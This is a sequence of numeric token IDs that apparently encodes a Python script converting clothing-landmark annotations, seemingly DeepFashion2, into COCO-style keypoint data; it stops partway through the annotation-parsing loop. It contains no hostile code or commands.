705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
1105,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
4223,
62,
49380,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
1511,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
82,
1359,
62,
49380,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
198,
2,
9376,
17,
198,
19608,
292,
316,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
352,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
785,
4666,
414,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1600,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
362,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
19849,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
513,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
49170,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
604,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
16684,
2649,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
642,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
34680,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1,
198,
30072,
198,
2,
27039,
17816,
66,
26129,
17,
6,
4083,
33295,
15090,
198,
2,
220,
220,
220,
220,
705,
312,
10354,
657,
11,
198,
2,
220,
220,
220,
220,
705,
3672,
10354,
366,
46430,
1600,
198,
2,
220,
220,
220,
220,
705,
16668,
22872,
10354,
366,
25265,
1,
198,
2,
32092,
198,
198,
4852,
62,
66,
26129,
796,
357,
16,
11,
362,
11,
513,
11,
604,
11,
642,
11,
718,
8,
198,
2902,
62,
66,
26129,
796,
357,
22,
11,
807,
11,
860,
8,
198,
1929,
2305,
62,
66,
26129,
796,
357,
940,
11,
1367,
11,
1105,
11,
1511,
8,
198,
66,
26129,
17,
62,
3672,
796,
37250,
785,
4666,
414,
3256,
705,
19849,
3256,
705,
49170,
3256,
705,
16684,
2649,
3256,
705,
34680,
20520,
198,
3911,
62,
3672,
796,
37250,
46430,
3256,
705,
4852,
3256,
705,
2902,
3256,
705,
1929,
2305,
20520,
198,
23350,
62,
1044,
4102,
62,
77,
5700,
796,
685,
1495,
11,
4747,
11,
3261,
11,
5014,
11,
1315,
11,
1315,
11,
838,
11,
1478,
11,
807,
11,
2808,
11,
5214,
11,
678,
11,
678,
60,
198,
9888,
62,
19199,
796,
37250,
34680,
3256,
705,
17470,
3256,
705,
4666,
395,
3256,
705,
11664,
20520,
198,
198,
2,
477,
275,
29305,
389,
40122,
515,
11,
1441,
2081,
198,
198,
9688,
62,
312,
796,
1315,
18005,
198,
22510,
62,
17566,
796,
604,
38503,
198,
15763,
62,
15908,
796,
31051,
14490,
14,
69,
648,
2395,
782,
13,
7285,
14,
38354,
14,
19608,
292,
1039,
14,
22089,
25265,
17,
14,
27432,
14,
6,
198,
2,
15763,
62,
15908,
796,
31051,
14490,
14,
69,
648,
2395,
782,
13,
7285,
14,
38354,
14,
19608,
292,
1039,
14,
22089,
25265,
17,
14,
27432,
14,
6,
198,
198,
7266,
62,
9630,
796,
657,
1303,
262,
6376,
286,
2323,
3872,
4554,
198,
7266,
62,
9630,
17,
796,
657,
1303,
262,
6376,
286,
37647,
17,
2323,
3872,
4554,
198,
1640,
997,
287,
2837,
7,
9688,
62,
312,
11,
923,
62,
312,
1343,
997,
62,
17566,
2599,
198,
220,
220,
220,
33918,
62,
3672,
796,
6808,
62,
15908,
1343,
705,
1236,
418,
14,
6,
1343,
965,
7,
22510,
737,
89,
20797,
7,
21,
47762,
4458,
17752,
6,
198,
220,
220,
220,
2939,
62,
3672,
796,
6808,
62,
15908,
1343,
705,
9060,
14,
6,
1343,
965,
7,
22510,
737,
89,
20797,
7,
21,
47762,
4458,
9479,
6,
198,
220,
220,
220,
3601,
7203,
36948,
23884,
1911,
18982,
7,
9060,
62,
3672,
4008,
628,
220,
220,
220,
611,
357,
22510,
29,
28,
15,
8,
290,
28686,
13,
6978,
13,
4468,
576,
7,
9060,
62,
3672,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
3590,
796,
7412,
13,
9654,
7,
9060,
62,
3672,
8,
198,
220,
220,
220,
220,
220,
220,
220,
9647,
11,
6001,
796,
3590,
13,
7857,
198,
220,
220,
220,
220,
220,
220,
220,
3709,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
351,
1280,
7,
17752,
62,
3672,
11,
705,
81,
11537,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20218,
796,
33918,
13,
46030,
7,
69,
13,
961,
28955,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2723,
796,
20218,
17816,
10459,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
8106,
262,
2836,
1366,
717,
11,
691,
779,
262,
6128,
1366,
287,
7108,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2723,
14512,
705,
24643,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5166,
62,
312,
796,
20218,
17816,
24874,
62,
312,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
27039,
17816,
17566,
6,
4083,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
25634,
62,
6371,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
4475,
62,
27144,
1522,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
7753,
62,
3672,
10354,
965,
7,
22510,
737,
89,
20797,
7,
21,
8,
1343,
45302,
9479,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
2704,
18994,
62,
6371,
10354,
705,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
997,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
43085,
10354,
657,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
10394,
10354,
9647,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
17015,
10354,
6001,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1312,
287,
20218,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1312,
6624,
705,
10459,
6,
393,
1312,
855,
6,
24874,
62,
312,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
796,
45941,
13,
9107,
418,
7,
27696,
1635,
513,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
850,
62,
9630,
796,
850,
62,
9630,
1343,
352,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5421,
278,
3091,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3091,
796,
20218,
58,
72,
7131,
6,
7784,
278,
62,
3524,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
266,
796,
3091,
58,
17,
45297,
3524,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
289,
796,
3091,
58,
18,
45297,
3524,
58,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
62,
16,
796,
3091,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
331,
62,
16,
796,
3091,
58,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
275,
3524,
41888,
87,
62,
16,
11,
88,
62,
16,
11,
86,
11,
71,
60,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
6536,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3797,
796,
20218,
58,
72,
7131,
6,
22872,
62,
312,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3797,
62,
3672,
796,
20218,
58,
72,
7131,
6,
22872,
62,
3672,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
584,
11688,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3918,
796,
20218,
58,
72,
7131,
6,
7635,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28953,
796,
20218,
58,
72,
7131,
6,
1177,
4122,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5046,
796,
20218,
58,
72,
7131,
6,
9888,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
19792,
62,
259,
796,
20218,
58,
72,
7131,
6,
89,
4207,
62,
259,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1609,
75,
4241,
796,
20218,
58,
72,
7131,
6,
420,
4717,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
325,
5154,
341,
290,
41532,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
384,
70,
796,
20218,
58,
72,
7131,
6,
325,
5154,
341,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
41532,
796,
20218,
58,
72,
7131,
6,
1044,
14306,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
87,
796,
41532,
58,
15,
3712,
18,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
88,
796,
41532,
58,
16,
3712,
18,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
85,
796,
41532,
58,
17,
3712,
18,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
87,
796,
45941,
13,
18747,
7,
13033,
62,
87,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
88,
796,
45941,
13,
18747,
7,
13033,
62,
88,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
62,
85,
796,
45941,
13,
18747,
7,
13033,
62,
85,
8,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
3797,
6624,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
299,
287,
2837,
7,
15,
11,
1679,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
60,
796,
2173,
62,
87,
58,
77,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
352,
60,
796,
2173,
62,
88,
58,
77,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2173,
58,
18,
1635,
299,
1343,
362,
60,
796,
2173,
62,
85,
58,
77,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
